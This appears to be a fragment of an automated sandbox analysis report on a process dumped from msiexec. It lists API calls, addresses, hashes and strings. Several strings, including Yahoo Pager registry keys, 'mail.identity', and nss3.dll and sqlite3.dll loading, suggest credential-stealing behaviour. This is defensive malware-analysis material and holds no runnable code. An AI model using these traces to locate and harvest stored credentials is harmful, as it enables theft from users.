                                                                                                    • API ID: memset$memcpy
                                                                                                    • String ID:
                                                                                                    APIs
                                                                                                    • __allrem.LIBCMT ref: 00425850
                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00425885
                                                                                                    • __allrem.LIBCMT ref: 00425933
                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042597B
                                                                                                    Similarity
                                                                                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                    • String ID:
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    • variable number must be between ?1 and ?%d, xrefs: 0042C5C2
                                                                                                    • too many SQL variables, xrefs: 0042C6FD
                                                                                                    Similarity
                                                                                                    • API ID: memset
                                                                                                    • String ID: too many SQL variables$variable number must be between ?1 and ?%d
                                                                                                    APIs
                                                                                                      • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 004026E4
                                                                                                    • memset.MSVCRT ref: 004026AD
                                                                                                      • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                                                                                      • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                                                                                      • Part of subcall function 004108E5: memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
                                                                                                      • Part of subcall function 004108E5: CoTaskMemFree.COMBASE(00000000), ref: 00410970
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 0040279C
                                                                                                    • LocalFree.KERNEL32(?), ref: 004027A6
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharFreeFromMultiStringUuidWide$LocalQueryTaskValuememcpymemset
                                                                                                    • String ID:
                                                                                                    APIs
                                                                                                      • Part of subcall function 00409DED: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000), ref: 00409E0E
                                                                                                      • Part of subcall function 00409DED: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 00409ED5
                                                                                                    • strlen.MSVCRT ref: 0040B60B
                                                                                                    • atoi.MSVCRT(?,00000000,?,76230A60,?,00000000), ref: 0040B619
                                                                                                    • _mbsicmp.MSVCRT ref: 0040B66C
                                                                                                    • _mbsicmp.MSVCRT ref: 0040B67F
                                                                                                    Similarity
                                                                                                    • API ID: _mbsicmp$??2@??3@atoistrlen
                                                                                                    • String ID:
                                                                                                    APIs
                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041140E
                                                                                                    • _gmtime64.MSVCRT ref: 00411437
                                                                                                    • memcpy.MSVCRT(?,00000000,00000024,?,?,000003E8,00000000), ref: 0041144B
                                                                                                    • strftime.MSVCRT ref: 00411476
                                                                                                    Similarity
                                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_gmtime64memcpystrftime
                                                                                                    • String ID:
                                                                                                    APIs
                                                                                                    Similarity
                                                                                                    • API ID: strlen
                                                                                                    • String ID: >$>$>
                                                                                                    APIs
                                                                                                    • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                                    • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                                    • memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                                    Similarity
                                                                                                    • API ID: memcpy
                                                                                                    • String ID: @
                                                                                                    APIs
                                                                                                    • GetModuleHandleA.KERNEL32(0044B405), ref: 0044B40E
                                                                                                    • GetModuleHandleA.KERNEL32(?,0044B405), ref: 0044B460
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0044B488
                                                                                                      • Part of subcall function 0044B42B: GetProcAddress.KERNEL32(00000000,0044B41C), ref: 0044B42C
                                                                                                    Similarity
                                                                                                    • API ID: AddressHandleModuleProc
                                                                                                    • String ID:
                                                                                                    APIs
                                                                                                    Similarity
                                                                                                    • API ID: _strcmpi
                                                                                                    • String ID: C@$mail.identity
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 00444573
                                                                                                      • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00410E73,?,?,?,?,00410E73,00000000,?,?), ref: 00410AF8
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: QueryValuememset
                                                                                                    • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                                                                                                    • API String ID: 3363972335-1703613266
                                                                                                    • Opcode ID: c25afbc6681bd6f67a4f4f243a5a512b3b390374a029d0210c15856865fede48
                                                                                                    • Instruction ID: e49b40feb516e52fd010a51085a75c79e183d02607987ed0dc43077d9115a6c0
                                                                                                    • Opcode Fuzzy Hash: c25afbc6681bd6f67a4f4f243a5a512b3b390374a029d0210c15856865fede48
                                                                                                    • Instruction Fuzzy Hash: E80196B6A00118BBEF11AA569D01F9A777CDF90355F1000A6FF08F2212E6749F599698
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 00406640
                                                                                                      • Part of subcall function 004063B2: memset.MSVCRT ref: 0040644F
                                                                                                      • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                                                                      • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                                                                    • memcmp.MSVCRT(?,00456EA0,00000010,?,?,?,00000060,?,?,00000000,00000000), ref: 00406672
                                                                                                    • memcpy.MSVCRT(?,?,00000018,?,00000060,?,?,00000000,00000000), ref: 00406695
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpy$memset$memcmp
                                                                                                    • String ID: Ul@
                                                                                                    • API String ID: 270934217-715280498
                                                                                                    • Opcode ID: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                                                                    • Instruction ID: 50cfa42ee3f36d69bd2a91aaf20a03d2fa08f341615043147a7a382cdea3e611
                                                                                                    • Opcode Fuzzy Hash: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                                                                    • Instruction Fuzzy Hash: 46017572A0020C6BEB10DAA58C06FEF73ADAB44705F450436FE49F2181E679AA1987B5
                                                                                                    APIs
                                                                                                      • Part of subcall function 004176F4: memcmp.MSVCRT(?,0044F118,00000008), ref: 004177B6
                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418726
                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418770
                                                                                                    Strings
                                                                                                    • recovered %d pages from %s, xrefs: 004188B4
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$memcmp
                                                                                                    • String ID: recovered %d pages from %s
                                                                                                    • API String ID: 985450955-1623757624
                                                                                                    • Opcode ID: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                                                                                                    • Instruction ID: 98aa3c95e39363207900286e283e4ca218167c091a2ac8f6aa08d387a6555cb7
                                                                                                    • Opcode Fuzzy Hash: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                                                                                                    • Instruction Fuzzy Hash: BA81AF759006049FDB25DBA8C880AEFB7F6EF84324F25441EE95597381DF38AD82CB58
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _ultoasprintf
                                                                                                    • String ID: %s %s %s
                                                                                                    • API String ID: 432394123-3850900253
                                                                                                    • Opcode ID: 314d7e330c7070d124fa50e0e353eda456261e74e4a8aa7da6b91d27fde07fbe
                                                                                                    • Instruction ID: 5b4e28b1b4fc8494891684f3550fd3cb18a3cec27640a2844273e51cea36df92
                                                                                                    • Opcode Fuzzy Hash: 314d7e330c7070d124fa50e0e353eda456261e74e4a8aa7da6b91d27fde07fbe
                                                                                                    • Instruction Fuzzy Hash: 80412331504A15C7C93595648B8DBEBA3A8BB46300F5804BFDCAAB32C0D3FCAD42865E
                                                                                                    APIs
                                                                                                    • LoadMenuA.USER32(00000000), ref: 00409078
                                                                                                    • sprintf.MSVCRT ref: 0040909B
                                                                                                      • Part of subcall function 00408F1B: GetMenuItemCount.USER32(?), ref: 00408F31
                                                                                                      • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408F55
                                                                                                      • Part of subcall function 00408F1B: GetMenuItemInfoA.USER32(?), ref: 00408F8B
                                                                                                      • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408FB8
                                                                                                      • Part of subcall function 00408F1B: strchr.MSVCRT ref: 00408FC4
                                                                                                      • Part of subcall function 00408F1B: _mbscat.MSVCRT ref: 0040901F
                                                                                                      • Part of subcall function 00408F1B: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 0040903B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                                                                                                    • String ID: menu_%d
                                                                                                    • API String ID: 1129539653-2417748251
                                                                                                    • Opcode ID: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                                                                    • Instruction ID: bbc3668ae8aad1463aedfde5e5dd5b48340f77aa4c3989790123ead7330def9b
                                                                                                    • Opcode Fuzzy Hash: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                                                                    • Instruction Fuzzy Hash: 2ED0C260A4124036EA2023366C0AF4B1A099BC271AF14022EF000B20C3EBFC844482BE
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    • failed memory resize %u to %u bytes, xrefs: 00411706
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _msizerealloc
                                                                                                    • String ID: failed memory resize %u to %u bytes
                                                                                                    • API String ID: 2713192863-2134078882
                                                                                                    • Opcode ID: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                                                                                                    • Instruction ID: 6d708a2afe7937de994116278d2c06faa365a3e4d7322368aba5da3f7b150b0b
                                                                                                    • Opcode Fuzzy Hash: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                                                                                                    • Instruction Fuzzy Hash: DBD0C2329092107EEB152250AC03B5FAB51DB80374F25850FF658451A1E6795C108389
                                                                                                    APIs
                                                                                                      • Part of subcall function 00406F96: GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,00409805,00000000,00409723,?,00000000,00000104,?), ref: 00406FA1
                                                                                                    • strrchr.MSVCRT ref: 00409808
                                                                                                    • _mbscat.MSVCRT ref: 0040981D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileModuleName_mbscatstrrchr
                                                                                                    • String ID: _lng.ini
                                                                                                    • API String ID: 3334749609-1948609170
                                                                                                    • Opcode ID: ef02889c57b29374549b5c1aa1c0392ef6eb8eedf2cf02011a8dcbac94fb250b
                                                                                                    • Instruction ID: 627d3aba04136714d7c1818045af5338c576ea1e6c84acb30438f8bc90b354f8
                                                                                                    • Opcode Fuzzy Hash: ef02889c57b29374549b5c1aa1c0392ef6eb8eedf2cf02011a8dcbac94fb250b
                                                                                                    • Instruction Fuzzy Hash: 73C080019497D018F12235212D03F4F06884F83709F34005FF801796C3EF9CA611407F
                                                                                                    APIs
                                                                                                    • _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                      • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                                                      • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                                                    • _mbscat.MSVCRT ref: 004070FA
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _mbscat$_mbscpystrlen
                                                                                                    • String ID: sqlite3.dll
                                                                                                    • API String ID: 1983510840-1155512374
                                                                                                    • Opcode ID: 703b69e07acbe077e06bd20ed0989211d3b3f883f36283526058d65f6b3f8447
                                                                                                    • Instruction ID: ab8058c300e11a65186fba7fca0927c942ef8f40a12134081a956aaad4b84faf
                                                                                                    • Opcode Fuzzy Hash: 703b69e07acbe077e06bd20ed0989211d3b3f883f36283526058d65f6b3f8447
                                                                                                    • Instruction Fuzzy Hash: 42C0803340517035770276717D03A9F794DCF81355B01045AF54451112F529891241EB
                                                                                                    APIs
                                                                                                    • GetWindowLongA.USER32(?,000000EC), ref: 004073D0
                                                                                                    • SetWindowLongA.USER32(00000001,000000EC,00000000), ref: 004073E2
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LongWindow
                                                                                                    • String ID: MZ@
                                                                                                    • API String ID: 1378638983-2978689999
                                                                                                    • Opcode ID: 8462b9c2cb3aef36d21d1686e73b86856dc2d3eef16ca418d57205f56e0b0ffb
                                                                                                    • Instruction ID: af96c772fb3515a1af29397562e0ba089e4702b068c0c421cdc779d54beb7f6e
                                                                                                    • Opcode Fuzzy Hash: 8462b9c2cb3aef36d21d1686e73b86856dc2d3eef16ca418d57205f56e0b0ffb
                                                                                                    • Instruction Fuzzy Hash: 81C0123015D0166BCF101B24DC04E167E54B782321F208770B062E00F0C7704400A504
                                                                                                    APIs
                                                                                                    • GetPrivateProfileStringA.KERNEL32(Server Details,?,0044C52F,A4@,0000007F,?), ref: 004033C8
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: PrivateProfileString
                                                                                                    • String ID: A4@$Server Details
                                                                                                    • API String ID: 1096422788-4071850762
                                                                                                    • Opcode ID: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                                                                    • Instruction ID: 3fa8da6ebb007cc1aa22036e73777017e29eb1af1cc7e931feee2a89adc62c4b
                                                                                                    • Opcode Fuzzy Hash: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                                                                    • Instruction Fuzzy Hash: C8C08C32189301BAEA418F80AD46F0EBBA2EBA8B00F044409B244200A682B94020EF17
                                                                                                    APIs
                                                                                                    • memcpy.MSVCRT(?,?,0000201C), ref: 0042C8E0
                                                                                                    • memcpy.MSVCRT(?,?,?), ref: 0042C917
                                                                                                    • memset.MSVCRT ref: 0042C932
                                                                                                    • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0042C96E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpy$memset
                                                                                                    • String ID:
                                                                                                    • API String ID: 438689982-0
APIs
• strlen.MSVCRT ref: 0040849A
• memset.MSVCRT ref: 004084D2
• memcpy.MSVCRT(?,00000000,?,?,?,?,68137B60,?,00000000), ref: 0040858F
• LocalFree.KERNEL32(00000000,?,?,?,?,68137B60,?,00000000), ref: 004085BA
Memory Dump Source
• Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
Similarity
• API ID: FreeLocalmemcpymemsetstrlen
• String ID:
• API String ID: 3110682361-0
APIs
• memcpy.MSVCRT(?,?,00000010), ref: 004161F4
• memcpy.MSVCRT(?,?,00000004), ref: 00416218
• memcpy.MSVCRT(?,?,00000004), ref: 0041623F
• memcpy.MSVCRT(?,?,00000008), ref: 00416265
Memory Dump Source
• Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
Similarity
• API ID: memcpy
• String ID:
• API String ID: 3510742995-0